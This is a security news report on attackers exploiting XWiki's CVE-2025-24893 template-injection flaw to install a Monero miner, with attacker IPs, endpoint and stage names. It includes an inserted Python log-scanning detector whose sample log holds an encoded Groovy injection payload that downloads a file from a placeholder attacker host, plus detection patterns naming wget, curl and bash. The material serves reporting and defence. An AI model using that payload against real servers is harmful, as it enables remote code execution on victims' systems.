Attackers Exploit XWiki RCE Vulnerability to Deploy Cryptocurrency Miners

An unauthenticated remote code execution vulnerability in XWiki is being actively exploited in the wild to deliver cryptocurrency mining malware, according to threat intelligence findings from VulnCheck.

The vulnerability, CVE-2025-24893, stems from a template injection flaw that lets an attacker execute arbitrary code on vulnerable systems without authentication, posing a significant threat to organizations running unpatched XWiki instances.

VulnCheck Canaries have captured a sophisticated two-stage attack chain demonstrating the real-world exploitation of this vulnerability.

Notably, despite ongoing active exploitation throughout 2025, the vulnerability does not currently appear in the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring a critical gap in official vulnerability tracking and the importance of third-party threat intelligence sources.

Two-Stage Exploitation Chain Targets XWiki Deployments

The exploitation workflow proceeds through a carefully orchestrated two-pass approach separated by at least 20 minutes.

In the initial attack phase, threat actors stage a downloader by sending a malicious GET request to the /bin/get/Main/SolrSearch endpoint.

The payload exploits the template injection vulnerability using Groovy scripting capabilities within the text parameter, executing a wget command that downloads a malicious file to the target system’s /tmp directory.

The first-stage downloader, designated as x640, functions as a minimal bash wrapper that immediately pulls two follow-on scripts from the attacker’s infrastructure and pipes them directly to bash for execution.

This staged approach allows attackers to modify payloads post-compromise and test victim connectivity before delivering final-stage malware.

The second-stage scripts establish the foundation for cryptocurrency mining operations.

The x521 script fetches and installs a UPX-packed binary named tcrond, a Monero cryptocurrency miner, while x522 prepares the system environment, terminates competing mining processes, and launches the miner with a configuration pointing to c3pool.org mining pools.

The cleanup commands executed by x522 demonstrate sophisticated operational security practices, including bash history deletion and process hardening techniques designed to evade detection.

Infrastructure and Attribution

All observed attack traffic originates from IP address 123.25.249.88, which geolocation data indicates is based in Vietnam.

This address appears extensively in recent AbuseIPDB reports documenting malicious activity.

The secondary payload server at 193.32.208.24 operates a transfer.sh instance on port 8080, serving multiple stages of the attack chain.

| CVE ID | Vulnerability Type | Attack Vector | CVSS Score | Affected Versions |
| --- | --- | --- | --- | --- |
| CVE-2025-24893 | Template Injection / RCE | Network (Unauthenticated) | 9.8 | XWiki versions vulnerable to template injection |

Implications for Enterprise Security

The absence of this vulnerability from CISA KEV despite confirmed active exploitation highlights a critical blind spot in official vulnerability catalogs.

Organizations should prioritize immediate patching of XWiki deployments, implement network segmentation to restrict outbound connections to mining pools, and deploy detection rules targeting the identified infrastructure IP addresses and file hashes.
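A detection rule of the kind recommended above, as an added example that is not part of the report or VulnCheck's tooling: it scans web-server access-log lines for requests to the SolrSearch endpoint whose text parameter carries Groovy or downloader markers, and for the source IP named in the report. The log lines are constructed, and attacker.example is a placeholder host.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the report; everything else below is constructed for illustration
KNOWN_BAD_IPS = {"123.25.249.88", "193.32.208.24"}
TARGET_PATH = "/bin/get/Main/SolrSearch"  # suffix match, since XWiki is often served under /xwiki
# Markers of template injection and stage-one downloader activity in the `text` parameter
PAYLOAD_MARKERS = re.compile(r"groovy|wget|curl|/tmp/|\bbash\b", re.IGNORECASE)

# Common Log Format: ip ident authuser [timestamp] "METHOD url PROTO" status size
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) \S+'
)


def analyze_line(line: str) -> Optional[dict]:
    """Return a finding for one access-log line, or None if it looks benign or is not CLF."""
    m = CLF.match(line)
    if not m:
        return None
    ip, url = m["ip"], m["url"]
    parts = urlsplit(url)
    reasons = []
    if ip in KNOWN_BAD_IPS:
        reasons.append("known_bad_ip")
    if parts.path.endswith(TARGET_PATH):
        # parse_qs percent-decodes the values, so the regex sees the plain parameter text
        text = " ".join(parse_qs(parts.query).get("text", []))
        if PAYLOAD_MARKERS.search(text):
            reasons.append("solrsearch_template_injection")
    if not reasons:
        return None
    return {"ip": ip, "path": parts.path, "status": int(m["status"]), "reasons": reasons}


def scan(lines):
    """Run analyze_line over an iterable of log lines and keep only the findings."""
    return [f for f in (analyze_line(l) for l in lines) if f]


# Constructed sample log: a benign search, an exploitation attempt, and a probe from the reported IP
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2025:12:00:00 +0000] "GET /xwiki/bin/get/Main/SolrSearch?text=release+notes HTTP/1.1" 200 4096',
    '123.25.249.88 - - [10/Oct/2025:12:01:00 +0000] "GET /bin/get/Main/SolrSearch?text=%7B%7Bgroovy%7D%7Dwget%20http%3A%2F%2Fattacker.example%2Fx640%20-O%20%2Ftmp%2Fx640%7B%7B%2Fgroovy%7D%7D HTTP/1.1" 200 512',
    '123.25.249.88 - - [10/Oct/2025:12:25:00 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 8192',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

In production the IP set and marker list would be fed from a threat-intelligence feed rather than hard-coded, and the `text` check should also be applied to POST bodies if the deployment accepts them on that endpoint.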

VulnCheck’s integration of third-party threat intelligence sources provides defenders with earlier warning of emerging threats compared to official vulnerability databases.


AnuPriya
AnuPriya is a cybersecurity reporter at Cyber Press, specializing in cyber attacks, dark web monitoring, data breaches, vulnerabilities, and malware. She delivers in-depth analysis on emerging threats and digital security trends.
